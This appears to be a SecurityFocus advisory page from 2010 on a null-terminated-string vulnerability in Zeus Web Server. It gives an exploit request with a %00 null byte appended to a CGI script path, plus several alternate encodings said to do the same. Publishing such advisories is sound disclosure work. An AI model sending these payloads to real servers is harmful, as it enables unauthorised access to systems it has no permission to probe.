info
discussion
exploit
solution
references
Zeus Web Server Null Terminated Strings Vulnerability
http ://target/script.cgi%00
"%00" may be replaced with "%G0", "%W0", "%EW", "%FG", "%UW", or "%VG" in order to achieve the same results.
Privacy Statement
Copyright 2010, SecurityFocus
